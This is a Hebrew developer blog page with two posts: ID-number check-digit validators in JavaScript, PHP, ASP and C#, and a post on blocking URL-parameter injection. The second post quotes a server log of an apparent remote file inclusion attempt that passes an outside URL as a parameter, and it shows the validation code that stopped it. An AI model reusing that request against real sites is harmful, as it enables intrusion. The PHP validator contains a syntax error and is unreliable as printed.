‏הצגת רשומות עם תוויות PHP. הצג את כל הרשומות
‏הצגת רשומות עם תוויות PHP. הצג את כל הרשומות

יום ראשון, 10 באוגוסט 2008

אימות מספר תעודת זהות וספרת ביקורת

הקוד להלן בודק את תקינות מספר תעודת הזהות. את הבדיקות יש לבצע גם בצד הלקוח ב javascript וגם בצד השרת. הסיבה לביצוע בצד הלקוח היא לתת תגובה מידית ללא צורך בפנייה לשרת. הבדיקה הנוספת בצד השרת נועדה למנוע אפשרויות חדירה, בעיות אבטחה וכדומה.

עקרונות - בדיקת מספר תעודת זהות ישראלית נעשית על פי נוסחה. המספר מורכב מתשע ספרות, שהימנית שבהן היא ספרת ביקורת. סיפרה זו נועדה לגלות בקלות טעות בהקלדת מספר הזהות. במאמר הבא ניתן לקרוא עוד על האלגוריתם לחישוב סיפרת ביקורת של מספר תעודת זהות ישראלית.



JavaScript
----------------------------------
<script LANGUAGE="javascript">

// DEFINE RETURN VALUES
var R_ELEGAL_INPUT = -1;
var R_NOT_VALID = -2;
var R_VALID = 1;

function ValidateID(str)
{
   //INPUT VALIDATION

   // Just in case -> convert to string
   var IDnum = String(str);

   // Validate correct input
   if ((IDnum.length > 9) || (IDnum.length < 5))
      return R_ELEGAL_INPUT;
   if (isNaN(IDnum))
      return R_ELEGAL_INPUT;

   // The number is too short - add leading 0000
   if (IDnum.length < 9)
   {
      while(IDnum.length < 9)
      {
         IDnum = '0' + IDnum;         
      }
   }

   // CHECK THE ID NUMBER
   var mone = 0, incNum;
   for (var i=0; i < 9; i++)
   {
      incNum = Number(IDnum.charAt(i));
      incNum *= (i%2)+1;
      if (incNum > 9)
         incNum -= 9;
      mone += incNum;
   }
   if (mone%10 == 0)
      return R_VALID;
   else
      return R_NOT_VALID;
}
</script>
----------------------------------

PHP
----------------------------------
<?php

// DEFINE RETURN VALUES
define(R_ELEGAL_INPUT, -1);
define(R_NOT_VALID, -2);
define(R_VALID, 1);

function ValidateID($str)
{
   //Convert to string, in case numeric input
   $IDnum = strval($str);

   //validate correct input
   if(! ctype_digit($IDnum)) // is it all digits
      return R_ELEGAL_INPUT;
   if((strlen($IDnum)>9) || (strlen($IDnum)<5))
      return R_ELEGAL_INPUT;

   //If the input length less then 9 and bigger then 5 add leading 0
   while(strlen($IDnum<9)
   {
      $IDnum = '0'.$IDnum;
   }

   $mone = 0;
   //Validate the ID number
   for($i=0; $i<9; $i++)
   {
      $char = mb_substr($IDnum, $i, 1);
      $incNum = intval($char);
      $incNum*=($i%2)+1;
      if($incNum > 9)
         $incNum-=9;
      $mone+= $incNum;
   }

   if($mone%10==0)
      return R_VALID;
   else
      return R_NOT_VALID;
}
?>
----------------------------------

ASP
----------------------------------
Dim R_ELEGAL_INPUT
Dim R_NOT_VALID
Dim R_VALID

R_ELEGAL_INPUT = -1
R_NOT_VALID = -2
R_VALID = 1

Function ValidateID(str)

    ' INPUT VALIDATION
    ' Just in case -> convert to string
    Dim IDnum
    IDnum = CStr(str)

    ' Validate correct input
    If len(IDnum) > 9 or len(IDnum) < 5 then
        ValidateID = R_ELEGAL_INPUT
    Else
        If not IsNumeric(IDnum) then
            ValidateID = R_ELEGAL_INPUT
        Else
             ' The number is too short - add leading 0000
             If len(IDnum) < 9 then
                while len(IDnum) < 9
                    IDnum = "0" & IDnum
                wend
             End If
 
             ' CHECK THE ID NUMBER
             Dim mone
             Dim incNum
             Dim i
             mone = 0
 
             for i = 1 to 9
                incNum = int(Mid(IDnum,i,1))
                incNum = incNum * (((i-1) mod 2) + 1)
                If incNum > 9 then
                    incNum = incNum - 9
                End If
                mone = mone + incNum
             next

            If mone mod 10 = 0 then
                ValidateID = R_VALID
            Else
                ValidateID = R_NOT_VALID
            End If

        End If
    End If

End Function
----------------------------------

C#
----------------------------------

class ValidateHelper
{

   // DEFINE RETURN VALUES
   public enum TzStatus {
       R_NOT_VALID = -2,
       R_ELEGAL_INPUT = -1,
       R_VALID = 1
   };

   public static TzStatus ValidateID(string IDNum) {

       // Validate correct input
       if( !System.Text.RegularExpressions.Regex.IsMatch(IDNum, @"^\d{5,9}$") )
            return TzStatus.R_ELEGAL_INPUT;

       // The number is too short - add leading 0000
       if( IDNum.Length < 9 ) {
            while( IDNum.Length < 9 ) {
                IDNum = '0' + IDNum;
            }
       }

       // CHECK THE ID NUMBER
       int mone = 0;
       int incNum;
       for( int i = 0 ; i < 9 ; i++ ) {
            incNum = Convert.ToInt32(IDNum[i].ToString());
            incNum *= ( i % 2 ) + 1;
            if( incNum > 9 )
                incNum -= 9;
            mone += incNum;
       }
       if( mone % 10 == 0 )
            return TzStatus.R_VALID;
       else
            return TzStatus.R_NOT_VALID;
   }
}

יום שלישי, 8 ביולי 2008

תרשום לי זריקה

על הזרקות SQL ונסיונות לגנוב תעבורה.

במערכות שאנו בונים אנו מתקינים מנגנונים שיעזרו לנו להתגבר על תקלות. אחד הכלים הבסיסים הוא רישום תקלות ל Logger, קובץ מיוחד שעוקב אחרי המתרחש במערכת. במקרים של נסיונות חדירה זדונית הכלי הזה מתגלה כיעיל במיוחד, למשל בנסיון הזרקת נתונים.

מהי הזרקת נתונים - באתרים דינמיים רבים משתמשים לצורך העברת בקשות מידע ברישום נתוני הבקשה בכתובת ה URL של הדף. השיקולים להעברת המידע כך רבים ובמיוחד יש לציין את האפשרות של מנועי חיפוש כמו גוגל לאנדקס טוב יותר את הדף ולחזור אליו. הבעיה הגדולה בשימוש זה היא הפוטנציאל של האקרים לבצע נסיונות חדירה דרך נתוני הכתובת הגלויים.

דוגמה לנסיון חדירה כזה ניתן לראות ברישום הלוג הבא (הלוג רושם את נסיון החדירה וכל המידע הנדרש למעקב וטיפול):

זהו קובץ שאמור לקבל דרך משתנה בשם addID, נתון שהוא מספר. בשורה המודגשת אנחנו רואים שמישהו ניסה להזין לשדה זה כתובת URL מאתר אחר, כנראה כדי למשוך ממנו קובץ הוראות לשרת.

======== Warning ===========
DOA-addhandler - 201
This page : /request.php?addID=http://xishisneplace.chat.ru/images?
REMOTE_ADDR : 83.86.158.214
REMOTE_HOST :
REMOTE_PORT : 13281
SCRIPT_FILENAME : /public_html/wiki/request.php
HTTP_REFERER :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)

הדרך לחסום נסיונות חדירה כאלה פשוטה למדי, כל נתון, אבל כל נתון, המגיע מהגולש נבדק לפני שמשתמשים בו. למשל, אלה שורות הקוד שמנעו את החדירה דרך הנתון המדובר בדף הזה:

קוד PHP

if (!isset($_GET['addID']))
logAndDie("addhandler - " . __LINE__ ) ;

$id = $_GET['addID'];

if (!is_numeric($id))
logAndDie("addhandler - " . __LINE__ ) ;

כפי שניתן לראות נעשות מספר בדיקות:
1. האם בכלל יש לנו משתנה בשם AddID, אם אין - רשום ל Logger וצא.
2. קרא את המשתנה.
3. האם המשתנה הוא מספר, אם לא - רשום ל Logger וצא.
השורה השלישית הזו היא בדיוק מה שתפס את נסיון הפריצה הפעם.

ברור שלכל משתנה צריך לבנות את שורת הבדיקות המתאימה לו אבל העיקרון תמיד דומה - לבדוק תמיד, לחשוד תמיד, לא לסמוך אף פעם על נתון שמגיע מבחוץ.